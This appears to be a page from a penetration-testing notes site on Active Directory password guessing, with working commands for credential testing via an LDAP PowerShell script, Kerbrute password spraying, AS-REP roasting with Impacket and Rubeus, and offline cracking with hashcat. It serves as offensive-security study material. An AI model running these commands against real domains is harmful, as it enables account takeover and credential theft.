Particle42
  • 🔬Network Enumeration
    • NMAP
    • TCPdump
  • 🔭Website Enumeration
    • Passive Information Gathering
    • Subdomain Enumeration
  • 🖥️Web Application
    • URL & App Scan
    • Subdomain/Vhost Fuzz
    • Login Hack
    • Cross Site Scripting
    • Directory Traversal
    • Local File Inclusion
    • Remote File Inclusion
    • PHP Wrappers
    • SQL Injection
      • Bypass Authentication
      • Database Enumeration
      • Code Execution Via Injection
      • SQL Injection Tools
      • Other Resources
    • NOSQL Injection
      • Bypass Authentication
    • WordPress Scanner
    • Hints & Easter Eggs
  • 🎣Phishing
    • Client Info Gathering
    • HTA
    • Word Macros
    • Windows Library Files
  • 🪟Windows
    • Enumeration & PE Quick Ref
    • Enumeration
      • Users
      • Powershell History
      • System Details
      • Applications & Services
      • Files & Filesystems
      • Cached Creds
    • Windows PE
      • Windows PE Checklist
      • Service Binary Hijacking
      • Important Files
      • Service DLL Hijacking
      • Unquoted Service Paths
      • Other PE Methods
      • Finding PE Vulns
      • SeImpersonatePrivilege
      • Bypassuac using Bypassuac.exe
      • Bypassuac using eventviewer.exe
      • Rasta Watson
    • Windows Remote Access
  • 📂Active Directory
    • About
    • Important Definitions
    • Exploitation Methodology
    • AD Kerberos
      • Invoke-Kerberoast - Shortcut
    • Domain Recon
      • Auto Recon
    • AD Authentication Attacks
      • Password Guessing
      • Creating & Cracking TGS
      • Kerberoasting
    • Lateral Movement
      • Pass the Hash
      • Overpass the Hash
      • Pass the Ticket
      • Distributed Component Object Model
      • Golden Ticket
      • Shadow Copy
      • Domain Controller Sync
      • Windows Management Instrumentation
      • PowerShell Remoting
    • All Commands, Tools & Scripts
      • Using Crackmapexec
      • Using Powerview
      • Important Scripts & Links
  • 🍺Buffer Over Flow
    • Finding EIP Position
    • Eliminating Bad Characters
    • Finding Return Address
    • Payload for BOF
  • 🐧Linux
    • Enumeration
      • Users
      • Encrypted Files
      • System Info
      • Files & Filesystems
      • Applications & Services
    • Attack Vectors
      • Authorised Keys
    • Linux PE
      • Enumeration Commands
      • Finding PE Vulns
      • Check Sudo List
      • Add User to Passwd File
      • SUIDs
      • Tasks with Wildcard
      • Dirty Cow
      • DirtyPipe
      • Insecure File Permissions
      • Enumerating Processes
    • Quick Commands
  • Services
    • SMB
      • Find Server Version
      • Directory Traversal using Symlink
      • Enable Passwordless SMB Access
    • MSSQL
    • MYSQL
    • PHPLiteAdmin
    • SSH
      • Limited Keys Issue
    • SMTP
      • Sending Email
    • Webdav
    • DNS
      • DNS Recon
  • ↗️Pivoting
    • Bringing Internet Access
    • Port Forwarding
      • Local Port Forwarding
      • Remote Port Forwarding
      • Dynamic Port Forwarding
    • HTTP Tunnel-ing
    • DNS Tunneling
    • Chisel
    • Ligolo-NG
  • 🔑Passwords
    • Wordlist Generation
    • HTTP Applications
    • OS Login
    • Password Cracking
      • Using Hashes Directly
      • Cracking Hashes
    • SAM & System
  • 🛠️Practical Tools
    • Remote Shell
      • Alternate Reverse Shells
      • Move to Interactive Shell
    • File Transfers
      • Quick Webservers
    • CURL
    • Payloads
      • MSFVenom
      • Veil Framework
    • Crafty Executable
    • Metasploit
      • Discovery
    • IMPACKET
      • MSSQL-Client
    • Clever Alternatives
  • 🚀Privilege Escalation
    • General Info
  • ⚡Resources
    • Exploits
Powered by GitBook
On this page
  • Basic Powershell Script
  • Crackmapexec
  • Obtaining a TGT
  • AS-Rep Roasting
  • Using Impacket
  • Using Rubeus

Was this helpful?

  1. Active Directory
  2. AD Authentication Attacks

Password Guessing

Basic Powershell Script

This method is a slow and low password guessing attempt using powershell script that uses LDAP and ADSI. In the following powershell script we are trying to use the DirectoryEntry constructor with a different username and password. This creates a directory entry in the context of the mentioned user and if found successful, then the object is created and we can conclude that the password is correct.

$domainObject = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObject.PdcRoleOwner).Name
$SearchURL = "LDAP://"
$SearchURL += $PDC + "/"
$UniqueName = "DC=$($domainObject.Name.Replace('.', ',DC='))"
$SearchURL += $UniqueName
New-Object System.DirectoryServices.DirectoryEntry($SearchURL, "username", "password!")

Crackmapexec

Crackmapexec tool can be used to access the SMB service using the username and password.

Using Crackmapexec

Obtaining a TGT

In this method we can attempt to get a TGT from the Domain Controller using a username and password. Kerbrute is one of the tools that can be used for password guessing using this method. The syntax to the command is as follows,

.\kerbrute_windows_amd64.exe passwordspray -d p42.com .\usernames.txt "password!"

AS-Rep Roasting

As part of obtaining a TGT the username and password has to be presented to the domain controller and this is called preauthentication. Sometimes preauthentication is disabled and any user can send a AS-Req on another user's behalf and get an AS-Rep. Once obtained this can be used to guess the password offline.

Using Impacket

Impactet can be used for performing this attack using the following command,

impacket-GetNPUsers -dc-ip 192.168.1.2 -request -outputfile hash.asreproast p42.com/username

This should fetch the AS-Rep hash that can be cracked using hashcat using the following command,

sudo hashcat -m 18200 hash.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Using Rubeus

Rubeus is a Windows tool that can be used to perform the same attack. This tool identifies from the list of users that is vulnerable to this attack and then performs it. The output of the tool displays the hash of the user. The hash can then be used to guess the password using hashcat as above.

.\Rubeus.exe asreproast /nowrap

In a given domain the users that do not require preauthentication can be identified by using PowerView.ps1's function "Get-DomainUser" with the option "-PreauthNotRequired".

PreviousAD Authentication AttacksNextCreating & Cracking TGS

Last updated 1 year ago

Was this helpful?

📂